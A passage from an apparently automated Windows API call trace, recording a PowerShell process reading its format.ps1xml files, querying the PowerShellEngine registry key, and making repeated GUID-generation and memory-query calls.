lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0108.372] ReadFile (in: hFile=0x340, lpBuffer=0x3485198, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x3485198*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0108.372] ReadFile (in: hFile=0x340, lpBuffer=0x3485198, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x3485198*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0108.372] ReadFile (in: hFile=0x340, lpBuffer=0x3485198, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x3485198*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0108.373] ReadFile (in: hFile=0x340, lpBuffer=0x3485198, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x3485198*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0108.373] ReadFile (in: hFile=0x340, lpBuffer=0x3485198, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x3485198*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0108.374] ReadFile (in: hFile=0x340, lpBuffer=0x3485198, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x3485198*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0108.374] ReadFile (in: hFile=0x340, lpBuffer=0x3485198, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x3485198*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0108.374] ReadFile (in: hFile=0x340, lpBuffer=0x3485198, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x3485198*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0108.375] ReadFile (in: hFile=0x340, lpBuffer=0x3485198, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x3485198*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0108.375] ReadFile (in: hFile=0x340, lpBuffer=0x3485198, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x3485198*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0108.375] ReadFile (in: hFile=0x340, lpBuffer=0x3485198, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x3485198*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0108.375] ReadFile (in: hFile=0x340, lpBuffer=0x3485198, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x3485198*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0108.377] ReadFile (in: hFile=0x340, lpBuffer=0x3485198, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x3485198*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0108.377] ReadFile (in: hFile=0x340, lpBuffer=0x3485198, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x3485198*, lpNumberOfBytesRead=0x10d058*=0xbce, lpOverlapped=0x0) returned 1 [0108.377] ReadFile (in: hFile=0x340, lpBuffer=0x34848ce, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x34848ce*, lpNumberOfBytesRead=0x10d058*=0x0, lpOverlapped=0x0) returned 1 [0108.377] ReadFile (in: hFile=0x340, lpBuffer=0x3485198, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x3485198*, lpNumberOfBytesRead=0x10d058*=0x0, lpOverlapped=0x0) returned 1 [0108.378] CloseHandle (hObject=0x340) returned 1 [0108.378] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10cda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0108.378] SetErrorMode (uMode=0x1) returned 0x1 [0108.378] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x10d000 | out: lpFileInformation=0x10d000*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1 [0108.378] SetErrorMode (uMode=0x1) returned 0x1 [0108.378] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0108.379] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d0e8 | out: phkResult=0x10d0e8*=0x340) returned 0x0 [0108.379] RegQueryValueExW (in: hKey=0x340, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10d06c, lpData=0x0, lpcbData=0x10d068*=0x0 | out: lpType=0x10d06c*=0x1, lpData=0x0, lpcbData=0x10d068*=0x56) returned 0x0 [0108.379] CoTaskMemAlloc (cb=0x5a) returned 0x2a1c30 [0108.379] RegQueryValueExW (in: hKey=0x340, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10d03c, lpData=0x2a1c30, lpcbData=0x10d038*=0x56 | out: lpType=0x10d03c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x10d038*=0x56) returned 0x0 [0108.379] CoTaskMemFree (pv=0x2a1c30) [0108.379] RegCloseKey (hKey=0x340) returned 0x0 [0108.379] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0108.380] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10cbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0108.381] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0xfac6deac, Data2=0x6421, Data3=0x4a3c, Data4=([0]=0x91, [1]=0xf9, [2]=0x67, [3]=0x97, [4]=0xfe, [5]=0x4a, [6]=0xdd, [7]=0x8f))) returned 0x0 [0108.381] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0xef81bf4a, Data2=0xb437, Data3=0x4de9, Data4=([0]=0xb1, [1]=0x63, [2]=0xe7, [3]=0x61, [4]=0xa6, [5]=0x8f, [6]=0x62, [7]=0x65))) returned 0x0 [0108.382] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0x146d919, Data2=0x2d12, Data3=0x486d, Data4=([0]=0x91, [1]=0xc6, [2]=0x4b, [3]=0x9e, [4]=0xa, [5]=0x7c, [6]=0x3e, [7]=0x90))) returned 0x0 [0108.382] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0x9a20bf29, Data2=0x3649, Data3=0x4f79, Data4=([0]=0x93, [1]=0x58, [2]=0x4a, [3]=0x2d, [4]=0x9b, [5]=0x7d, [6]=0xda, [7]=0xef))) returned 0x0 [0108.382] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0x1fa1185f, Data2=0x9524, Data3=0x454a, Data4=([0]=0x98, [1]=0x44, [2]=0x9d, [3]=0x80, [4]=0xab, [5]=0x78, [6]=0xf0, [7]=0x61))) returned 0x0 [0108.382] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0x1d26a9c4, Data2=0x7ac0, Data3=0x4752, Data4=([0]=0x83, [1]=0x93, [2]=0x27, [3]=0x7f, [4]=0xe0, [5]=0xde, [6]=0x66, [7]=0xa5))) returned 0x0 [0108.383] VirtualQuery (in: lpAddress=0x10bcc0, lpBuffer=0x10cb80, dwLength=0x30 | out: lpBuffer=0x10cb80*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.384] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0x1c5cc336, Data2=0x5421, Data3=0x4039, Data4=([0]=0x87, [1]=0x9b, [2]=0xb5, [3]=0x16, [4]=0xc1, [5]=0x13, [6]=0xea, [7]=0x9))) returned 0x0 [0108.384] VirtualQuery (in: lpAddress=0x10bcc0, lpBuffer=0x10cb80, dwLength=0x30 | out: lpBuffer=0x10cb80*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.385] VirtualQuery (in: lpAddress=0x10bcc0, lpBuffer=0x10cb80, dwLength=0x30 | out: lpBuffer=0x10cb80*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.386] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0x781c8ec4, Data2=0x432, Data3=0x4a9a, Data4=([0]=0x8a, [1]=0x6d, [2]=0xdb, [3]=0x4f, [4]=0xd1, [5]=0x9a, [6]=0x22, [7]=0x6b))) returned 0x0 [0108.386] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0xd5ab4f05, Data2=0xe831, Data3=0x4aeb, Data4=([0]=0xa5, [1]=0x94, [2]=0xc3, [3]=0x84, [4]=0xa0, [5]=0x2e, [6]=0x91, [7]=0xed))) returned 0x0 [0108.386] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0xab8f2d00, Data2=0xaa0a, Data3=0x4e55, Data4=([0]=0xbd, [1]=0x7, [2]=0xac, [3]=0x78, [4]=0xaf, [5]=0xfb, [6]=0x26, [7]=0x88))) returned 0x0 [0108.387] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0x992bad57, Data2=0xf704, Data3=0x4c03, Data4=([0]=0xb8, [1]=0x43, [2]=0x86, [3]=0x7f, [4]=0x1, [5]=0x2d, [6]=0x36, [7]=0xf4))) returned 0x0 [0108.387] VirtualQuery (in: lpAddress=0x10bcc0, lpBuffer=0x10cb80, dwLength=0x30 | out: lpBuffer=0x10cb80*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.388] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0xfa46a916, Data2=0xebe7, Data3=0x49a7, Data4=([0]=0xa2, [1]=0x45, [2]=0x4e, [3]=0x95, [4]=0x39, [5]=0x9e, [6]=0x48, [7]=0x4a))) returned 0x0 [0108.388] VirtualQuery (in: lpAddress=0x10bcc0, lpBuffer=0x10cb80, dwLength=0x30 | out: lpBuffer=0x10cb80*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.389] VirtualQuery (in: lpAddress=0x10bcc0, lpBuffer=0x10cb80, dwLength=0x30 | out: lpBuffer=0x10cb80*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.390] VirtualQuery (in: lpAddress=0x10bcc0, lpBuffer=0x10cb80, dwLength=0x30 | out: lpBuffer=0x10cb80*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.390] VirtualQuery (in: lpAddress=0x10bcc0, lpBuffer=0x10cb80, dwLength=0x30 | out: lpBuffer=0x10cb80*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.391] VirtualQuery (in: lpAddress=0x10bcc0, lpBuffer=0x10cb80, dwLength=0x30 | out: lpBuffer=0x10cb80*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.392] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0x96d84ce8, Data2=0x5fc3, Data3=0x4e4e, Data4=([0]=0xb4, [1]=0x57, [2]=0x86, [3]=0xbc, [4]=0x1a, [5]=0xc3, [6]=0x85, [7]=0x5e))) returned 0x0 [0108.392] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0x4fc47b88, Data2=0xc018, Data3=0x4166, Data4=([0]=0x8c, [1]=0x38, [2]=0x2e, [3]=0x61, [4]=0xf3, [5]=0x52, [6]=0xb, [7]=0x21))) returned 0x0 [0108.392] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0x28493742, Data2=0xad1a, Data3=0x4e11, Data4=([0]=0xb6, [1]=0xa2, [2]=0x34, [3]=0xff, [4]=0x22, [5]=0xcb, [6]=0xf0, [7]=0xe1))) returned 0x0 [0108.393] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0x25214ad9, Data2=0xd512, Data3=0x4812, Data4=([0]=0x81, [1]=0x5f, [2]=0xb, [3]=0x39, [4]=0xff, [5]=0x7, [6]=0x60, [7]=0x8a))) returned 0x0 [0108.393] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0x1cb31f7b, Data2=0x5748, Data3=0x411a, Data4=([0]=0xbb, [1]=0x42, [2]=0x38, [3]=0xf6, [4]=0xa, [5]=0xb5, [6]=0x3d, [7]=0xb1))) returned 0x0 [0108.393] VirtualQuery (in: lpAddress=0x10bf80, lpBuffer=0x10ce40, dwLength=0x30 | out: lpBuffer=0x10ce40*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.394] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0x57dbf2c2, Data2=0xe1a7, Data3=0x434c, Data4=([0]=0x92, [1]=0x3d, [2]=0xdf, [3]=0xa, [4]=0x71, [5]=0xdd, [6]=0xd1, [7]=0x30))) returned 0x0 [0108.394] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0x7d05d928, Data2=0xeb94, Data3=0x40de, Data4=([0]=0x9c, [1]=0xcb, [2]=0xa5, [3]=0xeb, [4]=0xae, [5]=0xb7, [6]=0xdc, [7]=0x2d))) returned 0x0 [0108.394] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0xbd7cfb, Data2=0x4ec2, Data3=0x4ba7, Data4=([0]=0xb5, [1]=0x70, [2]=0x4c, [3]=0xc3, [4]=0xfe, [5]=0x2f, [6]=0xc7, [7]=0x60))) returned 0x0 [0108.395] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0x66005cd2, Data2=0x9318, Data3=0x45c1, Data4=([0]=0xb0, [1]=0xb8, [2]=0xbe, [3]=0x4, [4]=0x93, [5]=0x63, [6]=0xb4, [7]=0x46))) returned 0x0 [0108.395] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0xb13f730b, Data2=0xaf29, Data3=0x4ff0, Data4=([0]=0x98, [1]=0x55, [2]=0xa0, [3]=0x24, [4]=0xed, [5]=0x34, [6]=0x18, [7]=0xdb))) returned 0x0 [0108.396] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0x4b5fa5af, Data2=0x636b, Data3=0x4da7, Data4=([0]=0xbd, [1]=0x7d, [2]=0x47, [3]=0xaf, [4]=0x69, [5]=0xaa, [6]=0xb7, [7]=0xaf))) returned 0x0 [0108.396] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0x7cbf3ab1, Data2=0x438, Data3=0x4177, Data4=([0]=0xb2, [1]=0x60, [2]=0xfb, [3]=0x85, [4]=0xc9, [5]=0x44, [6]=0xb7, [7]=0x45))) returned 0x0 [0108.397] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0x7f18027d, Data2=0x1bbb, Data3=0x42c2, Data4=([0]=0x92, [1]=0x3f, [2]=0xee, [3]=0xf5, [4]=0x70, [5]=0x71, [6]=0x1f, [7]=0x3f))) returned 0x0 [0108.397] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0xf9961bdf, Data2=0x2964, Data3=0x4e43, Data4=([0]=0xaa, [1]=0x1a, [2]=0x48, [3]=0x67, [4]=0x6f, [5]=0xf6, [6]=0xb7, [7]=0xa0))) returned 0x0 [0108.398] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0xadc6fd66, Data2=0x8ebb, Data3=0x49b3, Data4=([0]=0x93, [1]=0x5, [2]=0x58, [3]=0x9e, [4]=0x3c, [5]=0x37, [6]=0x6e, [7]=0x92))) returned 0x0 [0108.399] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0x835e2ae7, Data2=0x62a2, Data3=0x4f94, Data4=([0]=0x84, [1]=0x5d, [2]=0x3a, [3]=0xca, [4]=0xc6, [5]=0xd7, [6]=0x65, [7]=0x21))) returned 0x0 [0108.399] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0x63eafa39, Data2=0x4d4d, Data3=0x4a26, Data4=([0]=0xbf, [1]=0xe2, [2]=0x3c, [3]=0xc, [4]=0x2, [5]=0xe7, [6]=0x6b, [7]=0xc6))) returned 0x0 [0108.399] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0x57263974, Data2=0xb3cc, Data3=0x4cdb, Data4=([0]=0xbe, [1]=0x50, [2]=0xcb, [3]=0xba, [4]=0x81, [5]=0x17, [6]=0x7e, [7]=0xe5))) returned 0x0 [0108.400] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0x16e5f6e0, Data2=0xe11b, Data3=0x4108, Data4=([0]=0x9f, [1]=0x89, [2]=0x9, [3]=0x95, [4]=0xd2, [5]=0xc7, [6]=0xc6, [7]=0x9d))) returned 0x0 [0108.400] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0x93739001, Data2=0x5b1, Data3=0x474a, Data4=([0]=0xa0, [1]=0xa2, [2]=0x76, [3]=0xce, [4]=0xb3, [5]=0x36, [6]=0xa0, [7]=0x65))) returned 0x0 [0108.400] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0xaac476d2, Data2=0x30b6, Data3=0x4b1e, Data4=([0]=0xa9, [1]=0x8c, [2]=0x2, [3]=0x2, [4]=0x86, [5]=0x9b, [6]=0x35, [7]=0x88))) returned 0x0 [0108.401] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0xb141183e, Data2=0xc75e, Data3=0x4c9d, Data4=([0]=0xac, [1]=0x4a, [2]=0x5d, [3]=0xed, [4]=0x2d, [5]=0x39, [6]=0xae, [7]=0x6b))) returned 0x0 [0108.401] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0xe2d1406e, Data2=0xc7b4, Data3=0x464a, Data4=([0]=0xb2, [1]=0x1c, [2]=0xcb, [3]=0x18, [4]=0xee, [5]=0xf4, [6]=0x91, [7]=0xe9))) returned 0x0 [0108.402] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0xfedb3bf1, Data2=0x8e8c, Data3=0x4204, Data4=([0]=0x86, [1]=0x77, [2]=0x74, [3]=0xed, [4]=0x2a, [5]=0x74, [6]=0x4, [7]=0x29))) returned 0x0 [0108.402] VirtualQuery (in: lpAddress=0x10bcc0, lpBuffer=0x10cb80, dwLength=0x30 | out: lpBuffer=0x10cb80*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.403] VirtualQuery (in: lpAddress=0x10bcc0, lpBuffer=0x10cb80, dwLength=0x30 | out: lpBuffer=0x10cb80*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.406] VirtualQuery (in: lpAddress=0x10bcc0, lpBuffer=0x10cb80, dwLength=0x30 | out: lpBuffer=0x10cb80*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.409] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0x865c641, Data2=0xfe6e, Data3=0x432f, Data4=([0]=0x99, [1]=0x20, [2]=0x35, [3]=0x98, [4]=0x2, [5]=0x7e, [6]=0x53, [7]=0x88))) returned 0x0 [0108.410] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10cad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0108.410] SetErrorMode (uMode=0x1) returned 0x1 [0108.410] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x340 [0108.410] GetFileType (hFile=0x340) returned 0x1 [0108.410] SetErrorMode (uMode=0x1) returned 0x1 [0108.410] GetFileType (hFile=0x340) returned 0x1 [0108.410] ReadFile (in: hFile=0x340, lpBuffer=0x35958b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x35958b8*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0108.418] ReadFile (in: hFile=0x340, lpBuffer=0x35958b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x35958b8*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0108.424] ReadFile (in: hFile=0x340, lpBuffer=0x35958b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x35958b8*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0108.424] ReadFile (in: hFile=0x340, lpBuffer=0x35958b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x35958b8*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0108.440] ReadFile (in: hFile=0x340, lpBuffer=0x35958b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x35958b8*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0108.444] ReadFile (in: hFile=0x340, lpBuffer=0x35958b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x35958b8*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0108.444] ReadFile (in: hFile=0x340, lpBuffer=0x35958b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x35958b8*, lpNumberOfBytesRead=0x10d058*=0x119, lpOverlapped=0x0) returned 1 [0108.445] ReadFile (in: hFile=0x340, lpBuffer=0x35958b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x35958b8*, lpNumberOfBytesRead=0x10d058*=0x0, lpOverlapped=0x0) returned 1 [0108.445] CloseHandle (hObject=0x340) returned 1 [0108.445] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10cda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0108.445] SetErrorMode (uMode=0x1) returned 0x1 [0108.445] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x10d000 | out: lpFileInformation=0x10d000*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1 [0108.445] SetErrorMode (uMode=0x1) returned 0x1 [0108.446] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0108.446] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d0e8 | out: phkResult=0x10d0e8*=0x340) returned 0x0 [0108.446] RegQueryValueExW (in: hKey=0x340, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10d06c, lpData=0x0, lpcbData=0x10d068*=0x0 | out: lpType=0x10d06c*=0x1, lpData=0x0, lpcbData=0x10d068*=0x56) returned 0x0 [0108.446] CoTaskMemAlloc (cb=0x5a) returned 0x2a1c30 [0108.446] RegQueryValueExW (in: hKey=0x340, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10d03c, lpData=0x2a1c30, lpcbData=0x10d038*=0x56 | out: lpType=0x10d03c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x10d038*=0x56) returned 0x0 [0108.446] CoTaskMemFree (pv=0x2a1c30) [0108.446] RegCloseKey (hKey=0x340) returned 0x0 [0108.446] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, 